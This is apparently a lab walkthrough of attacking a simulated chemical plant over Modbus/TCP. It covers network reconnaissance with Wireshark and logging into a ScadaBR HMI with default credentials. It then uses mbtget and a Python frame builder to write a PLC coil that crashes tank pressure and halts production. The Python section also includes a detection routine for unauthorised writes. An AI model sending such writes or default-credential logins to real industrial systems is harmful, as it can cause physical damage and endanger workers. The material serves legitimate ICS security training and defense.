MODBUS
What is Modbus?
Modbus is a widely used open communication protocol that enables communication between various industrial and automation systems. It is primarily used for Programmable Logic Controllers (PLCs) and has become the de facto standard for industrial-level communication.
Modbus carries traffic between a master device (e.g., a PLC, SCADA system, or computer) and one or more slave devices (e.g., sensors, actuators, or controllers). The protocol has no authentication and no encryption: any host that can reach a device's Modbus endpoint can read its values and, on most devices, write them. That property is what this exercise abuses. It supports communication over different mediums, including:
- Serial communication (RS-232/RS-485)
- Ethernet-based communication (Modbus TCP)
- Wireless communication networks
Its simplicity, reliability, and widespread acceptance make Modbus the preferred choice for industrial applications.
What Can Modbus Do?
Modbus allows devices in an industrial setting to communicate and exchange data efficiently. Some key functionalities include:
1. Data Read and Write:
- Modbus can read sensor values such as temperature, pressure, and flow rate.
- It can write commands to actuators, for example, turning a motor on/off.
2. Control Devices:
- Modbus allows control systems, such as PLCs or HMIs, to send commands to devices like pumps, valves, or lighting systems.
3. Monitor Processes:
- SCADA systems use Modbus to gather data from field devices.
- It helps check device statuses and warn operators of malfunctioning equipment.
4. Data Logging:
- Devices with Modbus capabilities can send process data to loggers and historians for analysis and record-keeping.
5. Interconnect Devices:
- Modbus enables interoperability between products from different vendors.
- This feature makes it useful in multi-vendor systems and relevant for IoT applications.
Tools you will need for this exercise are -
- VMware Workstation.
- GRFICSv2 VM environment.
- Kali Linux
- mbtget (a command-line Modbus/TCP client)
Shutting Down Process -
Using arp-scan

After enumerating the hosts on the segment, we open Wireshark to see which devices are talking to each other.
In the picture below we can see that 192.168.90.117 and 192.168.90.5 are exchanging HTTP packets on TCP port 8080, which reveals…

Now we click the link and it brings us to the ScadaBR page, as shown in the picture.

For the user ID and password we can either try common defaults such as root/root, or look up the product's default credentials online, as shown in the figure. An HMI that still accepts vendor defaults is the first finding here, although, as the rest of the exercise shows, the login is not even needed to change the process.

Now we can log in to the HMI portal, and this is what we see….

We can now watch in real time how changes in values affect the chemical process. The main tank is designed to stay between 2650 and 2750 kPa.
We are only monitoring the process so far, so let's find a way to change it. Wireshark will show us which device to talk to and which value to target.
We start a new capture and restrict it to Modbus traffic by typing modbus in the display filter and pressing ENTER:

Here you can see that 192.168.95.2, which is likely the PLC, keeps answering requests from 192.168.90.5 (the ScadaBR HMI we just logged in to) with a 1-byte data field.
That byte carries a single coil (a one-bit value) at address 40.

Now we want the actual value, so we keep scrolling through the responses until we find one that shows the value at address 40 is 0.

The fact that the HMI polls this coil again and again suggests that it is important! Let's see what happens when we set this value to 1.
We have already installed mbtget, so first let's take a look at its help page:

The bit (coil) functions are where we need to focus, so let's first read the value. We choose -r1 (read coils, Modbus function code 1) because that is the function code we saw in the capture:

We use the -a flag for the Modbus address, which is 40, the -p flag for the port, which is the default Modbus/TCP port 502, and finally the target IP:

Now let's see what happens if we set it to 1. All we have to change is the function flag from -r1 to -w5 (write single coil, function code 5), and give it the value 1:
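The exchange behind the two mbtget steps above (read coil 40, then write it to 1), rebuilt byte for byte as an added example. This is not part of the original walk-through and not mbtget's own code: it builds the same Modbus/TCP frames mbtget puts on the wire, decodes a constructed PLC reply of the kind seen in the Wireshark capture, shows that the device's only "confirmation" of a write is an echo of the request, and ends with the check a network monitor could run to flag write function codes from a host that is not the HMI. Address 40 and the two IPs 192.168.90.5 and 192.168.95.2 are taken from the text; the unit id of 1, the attacker address 192.168.90.200 and every response byte string are assumptions constructed for the example.

```python
import struct

# Modbus/TCP protocol constants. Address 40 and the HMI/PLC addresses come from
# the walk-through; every byte string below is constructed for this example.
MODBUS_PORT = 502             # the -p default in mbtget
FC_READ_COILS = 0x01          # mbtget -r1
FC_WRITE_SINGLE_COIL = 0x05   # mbtget -w5
# Function codes that change device state; a monitor should alert on these.
WRITE_FUNCTIONS = {0x05, 0x06, 0x0F, 0x10, 0x16, 0x17}
HMI_IP = "192.168.90.5"       # ScadaBR, the legitimate Modbus master (from the capture)
PLC_IP = "192.168.95.2"       # the device answering on port 502 (from the capture)
ATTACKER_IP = "192.168.90.200"  # assumed address for the Kali host


def mbap(transaction_id, pdu, unit_id=1):
    """Prepend the 7-byte MBAP header: transaction id, protocol id (always 0),
    length (unit id byte + PDU), unit id. There is no authentication field."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def read_coils_request(address, count=1, tid=1, unit_id=1):
    """Frame for `mbtget -r1 -a ADDRESS`: function 1, start address, quantity."""
    return mbap(tid, struct.pack(">BHH", FC_READ_COILS, address, count), unit_id)


def write_single_coil_request(address, value, tid=1, unit_id=1):
    """Frame for `mbtget -w5 -a ADDRESS VALUE`: function 5, address, then 0xFF00
    for on or 0x0000 for off (compliant devices reject any other value)."""
    state = 0xFF00 if value else 0x0000
    return mbap(tid, struct.pack(">BHH", FC_WRITE_SINGLE_COIL, address, state), unit_id)


def parse_frame(frame):
    """Split a Modbus/TCP ADU into header fields and PDU, validating the header."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    pdu = frame[7:]
    if len(pdu) != length - 1:
        raise ValueError("length field %d does not match %d-byte PDU" % (length, len(pdu)))
    return {"tid": tid, "unit": unit, "function": pdu[0], "pdu": pdu}


def coil_values(response, count):
    """Decode a Read Coils response: function, byte count, bits packed LSB first."""
    info = parse_frame(response)
    if info["function"] & 0x80:                  # exception response
        raise ValueError("Modbus exception code %d" % info["pdu"][1])
    byte_count = info["pdu"][1]
    data = info["pdu"][2:2 + byte_count]
    return [(data[i // 8] >> (i % 8)) & 1 for i in range(count)]


def write_target(frame):
    """(function, start address) if the frame is a write request, else None."""
    info = parse_frame(frame)
    if info["function"] not in WRITE_FUNCTIONS:
        return None
    address = struct.unpack(">H", info["pdu"][1:3])[0]
    return info["function"], address


def unexpected_writes(observed, allowed_masters):
    """Detection pass over (source ip, frame) pairs: every write that did not
    come from an allowed master is reported as (source ip, function, address)."""
    hits = []
    for src, frame in observed:
        target = write_target(frame)
        if target and src not in allowed_masters:
            hits.append((src, target[0], target[1]))
    return hits


# Constructed PLC replies standing in for what the capture showed:
# "address 40 is 0" before the attack, the write echoed back, then 1 afterwards.
READ_RESPONSE_BEFORE = mbap(1, bytes([FC_READ_COILS, 0x01, 0x00]))
WRITE_RESPONSE = mbap(2, bytes([FC_WRITE_SINGLE_COIL, 0x00, 0x28, 0xFF, 0x00]))
READ_RESPONSE_AFTER = mbap(3, bytes([FC_READ_COILS, 0x01, 0x01]))


def demo():
    """Walk the read-then-write steps and return what each side put on the wire."""
    read_req = read_coils_request(40, tid=1)
    write_req = write_single_coil_request(40, 1, tid=2)
    before = coil_values(READ_RESPONSE_BEFORE, 1)
    after = coil_values(READ_RESPONSE_AFTER, 1)
    # A write response echoes the request PDU; that is all the confirmation Modbus gives.
    echoed = parse_frame(WRITE_RESPONSE)["pdu"] == write_req[7:]
    traffic = [(HMI_IP, read_req), (ATTACKER_IP, read_req), (ATTACKER_IP, write_req)]
    alerts = unexpected_writes(traffic, {HMI_IP})
    return {"read_req": read_req.hex(), "write_req": write_req.hex(),
            "before": before, "after": after, "echoed": echoed, "alerts": alerts}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The read request is twelve bytes and the write is twelve bytes; nothing in either identifies or authorises the sender, which is why the PLC treats the Kali host exactly like the HMI. The detection pass only flags writes; on a segment where the HMI is the sole legitimate master, a Read Coils request from any other address is worth alerting on too, and the same parse_frame output gives you what you need to add that rule.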

Now check the HMI again….

It has dropped by over 1000 kPa in less than a minute!
Let's see where it ends up…..

It finally bottoms out at approximately 97 kPa.


Production is now shut down; we got what we wanted. Nothing stood between a host on the network and the process except reachability to TCP port 502: no credentials, no integrity check on the write, and the HMI's own polling told us which coil to flip.